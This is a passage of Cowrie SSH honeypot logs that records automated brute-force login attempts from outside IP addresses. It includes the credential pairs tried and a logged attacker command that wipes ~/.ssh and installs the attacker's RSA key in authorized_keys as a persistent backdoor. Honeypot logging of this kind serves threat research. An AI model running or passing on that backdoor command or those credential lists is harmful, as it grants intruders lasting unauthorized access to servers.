ge-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:20:36.660639Z","src_ip":"212.227.235.229","session":"3b86506c0776"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:20:38.181656Z","src_ip":"212.227.235.229","session":"3b86506c0776"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:39.562521Z","src_ip":"212.227.235.229","session":"3b86506c0776"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54570,"dst_ip":"1.2.3.4","dst_port":22,"session":"3615ee8e922a","protocol":"ssh","message":"New connection: 212.227.235.229:54570 (1.2.3.4:22) [session: 3615ee8e922a]","sensor":"my-vps","timestamp":"2025-09-09T02:20:39.940547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:20:39.949596Z","src_ip":"212.227.235.229","session":"3615ee8e922a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:20:40.325428Z","src_ip":"212.227.235.229","session":"3615ee8e922a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:20:41.840533Z","src_ip":"212.227.235.229","session":"3615ee8e922a"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:42.213912Z","src_ip":"212.227.235.229","session":"46dc7af07b3a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:42.217976Z","src_ip":"212.227.235.229","session":"3615ee8e922a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45936,"dst_ip":"1.2.3.4","dst_port":22,"session":"24e8c4e04825","protocol":"ssh","message":"New connection: 212.227.235.229:45936 (1.2.3.4:22) [session: 24e8c4e04825]","sensor":"my-vps","timestamp":"2025-09-09T02:20:46.292252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:20:46.293203Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:20:46.379294Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.login.success","username":"root","password":"090909","message":"login attempt [root/090909] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:20:46.768205Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:20:47.004594Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:20:47.005393Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:20:47.006148Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:47.093943Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:20:47.284597Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:20:47.285272Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:20:47.373516Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:47.374405Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45952,"dst_ip":"1.2.3.4","dst_port":22,"session":"d57c037899ad","protocol":"ssh","message":"New connection: 212.227.235.229:45952 (1.2.3.4:22) [session: d57c037899ad]","sensor":"my-vps","timestamp":"2025-09-09T02:20:47.458985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:20:47.459618Z","src_ip":"212.227.235.229","session":"d57c037899ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:20:47.545900Z","src_ip":"212.227.235.229","session":"d57c037899ad"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:20:47.932618Z","src_ip":"212.227.235.229","session":"d57c037899ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60216,"dst_ip":"1.2.3.4","dst_port":22,"session":"aee06157c9a2","protocol":"ssh","message":"New connection: 212.227.235.229:60216 (1.2.3.4:22) [session: aee06157c9a2]","sensor":"my-vps","timestamp":"2025-09-09T02:20:48.966264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:20:48.967184Z","src_ip":"212.227.235.229","session":"aee06157c9a2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:49.021153Z","src_ip":"212.227.235.229","session":"d57c037899ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:20:49.075321Z","src_ip":"212.227.235.229","session":"aee06157c9a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45964,"dst_ip":"1.2.3.4","dst_port":22,"session":"b96cc2c34cc3","protocol":"ssh","message":"New connection: 212.227.235.229:45964 (1.2.3.4:22) [session: b96cc2c34cc3]","sensor":"my-vps","timestamp":"2025-09-09T02:20:49.104701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:20:49.105317Z","src_ip":"212.227.235.229","session":"b96cc2c34cc3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:20:49.189024Z","src_ip":"212.227.235.229","session":"b96cc2c34cc3"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch@123","message":"login attempt [elasticsearch/elasticsearch@123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:20:49.548111Z","src_ip":"212.227.235.229","session":"aee06157c9a2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:20:49.563951Z","src_ip":"212.227.235.229","session":"b96cc2c34cc3"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:49.647954Z","src_ip":"212.227.235.229","session":"24e8c4e04825"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:49.649070Z","src_ip":"212.227.235.229","session":"b96cc2c34cc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45018,"dst_ip":"1.2.3.4","dst_port":22,"session":"1190a6596220","protocol":"ssh","message":"New connection: 212.227.235.229:45018 (1.2.3.4:22) [session: 1190a6596220]","sensor":"my-vps","timestamp":"2025-09-09T02:20:50.241731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:20:50.243462Z","src_ip":"212.227.235.229","session":"1190a6596220"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:20:50.543113Z","src_ip":"212.227.235.229","session":"1190a6596220"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:50.656538Z","src_ip":"212.227.235.229","session":"aee06157c9a2"}
{"eventid":"cowrie.login.failed","username":"hasan","password":"hasan","message":"login attempt [hasan/hasan] failed","sensor":"my-vps","timestamp":"2025-09-09T02:20:51.781703Z","src_ip":"212.227.235.229","session":"1190a6596220"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:53.084316Z","src_ip":"212.227.235.229","session":"1190a6596220"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60004,"dst_ip":"1.2.3.4","dst_port":22,"session":"04170395d40f","protocol":"ssh","message":"New connection: 212.227.235.229:60004 (1.2.3.4:22) [session: 04170395d40f]","sensor":"my-vps","timestamp":"2025-09-09T02:20:55.466124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:20:55.472731Z","src_ip":"212.227.235.229","session":"04170395d40f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:20:55.723009Z","src_ip":"212.227.235.229","session":"04170395d40f"}
{"eventid":"cowrie.login.failed","username":"tester","password":"password123","message":"login attempt [tester/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:20:56.734905Z","src_ip":"212.227.235.229","session":"04170395d40f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:20:57.991432Z","src_ip":"212.227.235.229","session":"04170395d40f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46590,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dd4974bf555","protocol":"ssh","message":"New connection: 212.227.235.229:46590 (1.2.3.4:22) [session: 5dd4974bf555]","sensor":"my-vps","timestamp":"2025-09-09T02:21:08.769970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:21:08.771276Z","src_ip":"212.227.235.229","session":"5dd4974bf555"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T02:21:09.056230Z","src_ip":"212.227.235.229","session":"5dd4974bf555"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:21:16.770238Z","src_ip":"212.227.235.229","session":"5dd4974bf555"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11730,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef810925d2ea","protocol":"ssh","message":"New connection: 185.152.45.241:11730 (1.2.3.4:22) [session: ef810925d2ea]","sensor":"my-vps","timestamp":"2025-09-09T02:21:20.196325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:21:20.197491Z","src_ip":"185.152.45.241","session":"ef810925d2ea"}
